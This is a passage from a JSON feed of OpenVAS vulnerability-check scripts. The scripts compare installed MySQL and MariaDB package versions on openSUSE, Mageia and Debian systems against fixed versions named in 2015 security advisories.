isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Mageia Linux Local Security Checks mgasa-2015-0445", "modified": "2018-09-28T00:00:00", "published": "2015-11-17T00:00:00", "id": "OPENVAS:1361412562310131134", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131134", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0445", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0445.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131134\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 11:00:02 +0200 (Tue, 17 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0445\");\n script_tag(name:\"insight\", value:\"This update provides the upstream 10.0.22 maintenance release and fixes various security issues.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0445.html\");\n script_cve_id(\"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", \"CVE-2015-4792\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0445\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.22~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46. Please see the MySQL 5.5 Release Notes\nand Oracle", "modified": "2017-07-07T00:00:00", "published": "2015-10-24T00:00:00", "id": "OPENVAS:703377", "href": "http://plugins.openvas.org/nasl.php?oid=703377", "type": "openvas", "title": "Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3377.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3377-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703377);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-10-24 00:00:00 +0200 (Sat, 24 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3377.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mysql-5.5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"MySQL is a fast, stable and true\nmulti-user, multi-threaded SQL database server.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution\n(wheezy), these problems have been fixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\");\n script_tag(name: \"summary\", value: \"Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46. Please see the MySQL 5.5 Release Notes\nand Oracle's Critical Patch Update advisory for further details:\n\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46.", "modified": "2019-03-18T00:00:00", "published": "2015-10-24T00:00:00", "id": "OPENVAS:1361412562310703377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703377", "type": "openvas", "title": "Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3377.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3377-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703377\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3377-1 (mysql-5.5 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-24 00:00:00 +0200 (Sat, 24 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3377.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"mysql-5.5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution\n(wheezy), these problems have been fixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered\nin the MySQL database server. The vulnerabilities are addressed by upgrading\nMySQL to the new upstream version 5.5.46.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:i386\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqlclient18:amd64\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-client-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-server-core-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-source-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mysql-testsuite-5.5\", ver:\"5.5.46-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22.", "modified": "2019-03-18T00:00:00", "published": "2015-10-31T00:00:00", "id": "OPENVAS:1361412562310703385", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703385", "type": "openvas", "title": "Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3385.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3385-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703385\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\",\n \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\",\n \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\",\n \"CVE-2015-4895\", \"CVE-2015-4913\");\n script_name(\"Debian Security Advisory DSA 3385-1 (mariadb-10.0 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-31 00:00:00 +0100 (Sat, 31 Oct 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3385.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"mariadb-10.0 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading\nMariaDB to the new upstream version 10.0.22.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.22-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += 